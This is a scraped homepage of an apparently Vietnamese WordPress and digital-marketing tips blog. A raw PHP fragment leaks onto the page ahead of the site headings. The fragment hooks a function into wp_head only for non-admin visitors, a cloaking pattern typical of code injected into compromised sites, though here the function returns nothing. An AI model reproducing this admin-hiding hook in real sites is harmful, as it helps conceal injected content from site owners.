if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return''; } } Văn Thế Web kênh chia sẻ kiến thức WordPress và Digital Marketing

Thủ thuật WordPress và SEO​

Video chia sẻ hữu ích